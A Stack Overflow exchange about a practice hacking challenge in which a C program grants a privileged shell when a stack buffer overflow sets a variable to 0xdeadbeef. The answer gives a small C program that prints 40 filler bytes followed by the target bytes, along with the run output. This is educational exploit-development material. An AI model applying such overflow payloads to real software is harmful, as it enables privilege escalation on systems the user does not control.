Stuck at hacking challenge in C (Stack buffer overflow)


I'm trying to overrun this buffer. I ran it like this: command here, but the value is not correct. I tried various inputs with which I actually overran the buffer but instead of my expected value of the check variable 0xdeadbeef the value is something like this: 0x73737373. What am I supposed to Input so that the value of check is 0xdeadbeef?

Here's the code:

#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>

int main()

  int var;
  int check = 0x04030201;
  char buf[40];


  printf("\n[buf]: %s\n", buf);
  printf("[check] %p\n", check);

  if ((check != 0x04030201) && (check != 0xdeadbeef)) //I'm only able to achieve this
    printf ("\nYou are on the right way!\n");

  if (check == 0xdeadbeef) //this is the value I want to have
     printf("Yeah dude! You win!\nOpening your shell...\n");
     setreuid(geteuid(), geteuid());
     printf("Shell closed! Bye.\n");
   return 0;

I get the programm to change the value of check but can't get it to change to 0xdeadbeef.

Heres the assembly dump:

   0x08048546 <+0>:     lea    0x4(%esp),%ecx
   0x0804854a <+4>:     and    $0xfffffff0,%esp
   0x0804854d <+7>:     pushl  -0x4(%ecx)
   0x08048550 <+10>:    push   %ebp
   0x08048551 <+11>:    mov    %esp,%ebp
   0x08048553 <+13>:    push   %esi
   0x08048554 <+14>:    push   %ebx
   0x08048555 <+15>:    push   %ecx
   0x08048556 <+16>:    sub    $0x3c,%esp
   0x08048559 <+19>:    call   0x8048480 <__x86.get_pc_thunk.bx>
   0x0804855e <+24>:    add    $0x1aa2,%ebx
   0x08048564 <+30>:    movl   $0x4030201,-0x1c(%ebp)
   0x0804856b <+37>:    mov    -0x4(%ebx),%eax
   0x08048571 <+43>:    mov    (%eax),%eax
   0x08048573 <+45>:    sub    $0x4,%esp
   0x08048576 <+48>:    push   %eax
   0x08048577 <+49>:    push   $0x2d
   0x08048579 <+51>:    lea    -0x44(%ebp),%eax
   0x0804857c <+54>:    push   %eax
   0x0804857d <+55>:    call   0x80483c0 <fgets@plt>
   0x08048582 <+60>:    add    $0x10,%esp
   0x08048585 <+63>:    sub    $0x8,%esp

If any of you can help me with this I'd be glad!

asked on Stack Overflow Jan 8, 2020 by DrNotch • edited Jan 8, 2020 by DrNotch

1 Answer


The trick is to create the right input for the program.
This is hard to impossible by just typing in things from the keyboard.
You could consult an ASCII table and some tricks to enter non-printable characters.

But it is easier to just make a program which does the right output and pipe it into the program to cheat.

Depending on endianess, either this code or one with reordered last four characters (not counting the newline) should do the trick.

#include <stdio.h>

int main()
{ printf("1234567890123456789012345678901234567890\xef\xbe\xad\xde\n"); /* works for me */
  /* or \xde\xad\xbe\xef */
  return 0;

Note that the '"\xnn"' is syntax for explicitly giving the hex value of a character (within a string) to output.

Compile it into an exectable "output" and use it to feed the needed output into the "target" executable like

output | target

output (removed the shell opening part):

[buf]: 1234567890123456789012345678901234567890´¥¡Ì
[check] deadbeef
Yeah dude! You win!
Opening your shell...
Shell closed! Bye.

Note I did this on Windows, but I hope I "transposed" it well enough to Nix.
If you are forced to use a provided shell and cannot execute self-written programs (probably the point), you need to explore your options to get that output fed into the program to cheat. Using some finetuned echo might do the trick. Or you might end up having to do the ASCII non-printable input thing after all.
Without knowing more about the available environment I cannot finally solve the problem.

You will have to experiment and research. This is by the way why I am comfortable with helping you as much with your assignment as I did above, because you still have to do what I consider the core of it yourself. In my opinon this matches the accepted compromise for helping with homework/assignment questions, as described here:
How do I ask and answer homework questions?

answered on Stack Overflow Jan 8, 2020 by Yunnosch

User contributions licensed under CC BY-SA 3.0